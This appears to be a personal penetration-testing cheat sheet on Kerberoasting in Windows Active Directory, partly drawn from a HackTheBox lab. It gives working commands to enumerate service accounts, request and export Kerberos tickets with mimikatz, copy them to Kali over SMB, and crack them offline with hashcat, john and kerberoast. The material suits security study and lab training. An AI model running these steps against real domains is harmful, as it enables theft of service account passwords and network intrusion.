Skip to content


  • (Step 1) - identify SPN for Services
  • (Step 2) - generate Service Ticket for SPN
  • (Step 3) - extract Service Ticket form memory
  • (Step 4) - transfer .kirbi file to kali
  • (Step 5) - crack Service Ticket to get plain text password


Kerberos is a protocol for authentication used in Windows Active Directory environments (though it can be used for auth to Linux hosts as well). In 2014, Tim Medin presented an attack on Kerberos he called Kerberoasting. It’s worth reading through the presentation, as Tim uses good graphics to illustrate the process, but I’ll try to give a simple overview.

When you want to authenticate to some service using Kerberos, you contact the DC and tell it to which system service you want to authenticate. It encrypts a response to you with the service user’s password hash. You send that response to the service, which can decrypt it with it’s password, check who you are, and decide it if wants to let you in.

In a Kerberoasting attack, rather than sending the encrypted ticket from the DC to the service, you will use off-line brute force to crack the password associated with the service.

Most of the time you will need an active account on the domain in order to initial Kerberoast, but if the DC is configured with UserAccountControl setting “Do not require Kerberos preauthentication” enabled, it is possible to request and receive a ticket to crack without a valid account on the domain.

version 1

Get Hash Use the script from Impacket to get a list of service usernames which are associated with normal user accounts. It will also get a ticket that I can crack. -request -dc-ip active.htb/SVC_TGS 
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon           
--------------------  -------------  --------------------------------------------------------  -------------------  -------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40  2018-07-21 11:05:53 
It also gives me the ticket, which I can try to brute force decrypt to get the user’s password:

root@kali:~/hackthebox/active- cat GetUserSPNs.out 
Decrypt with Hashcat
 hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force                                       

version 2

list SPN

setspn -T dc1 -Q */*
list SPN
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

$PDC = ($domainObj.PdcRoleOwner).Name

$searchStr = "LDAP://"
$searchStr += $PDC + "/"
$Name = "DC=$($domainObj.Name.Replace('.',',DC='))"
$searchStr += $Name

$seracher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchStr)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry

$seracher.SearchRoot = $objDomain

$seracher.filter = "serviceprincipalname=*"

$items = $seracher.FindAll()

Write-Host "-------------------------"

Foreach($obj in $items) {
    Foreach($prop in $obj.Properties) {
        Write-Host "Display Name:" $prop.displayname
        Write-Host "Serviceprincipal Name:" $prop.serviceprincipalname
    Write-Host "-------------------------"
create Service Token for SPN
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/'
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSQL/'
save token to disk
> mimikatz.exe
mimikatz> privilege::debug
mimikatz> kerberos::list /export
copy file to kali
# on kali
/opt/tools/impacket/examples/ public .
# on windows
copy '' \\\public\
tool:kerberoast - crack .kirbi file
sudo apt install -y kerberoast
python3 /usr/share/kerberoast/ /usr/share/wordlists/rockyou.txt
tool:john - crack .kirbi file
/opt/tools/kerberoast/ > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt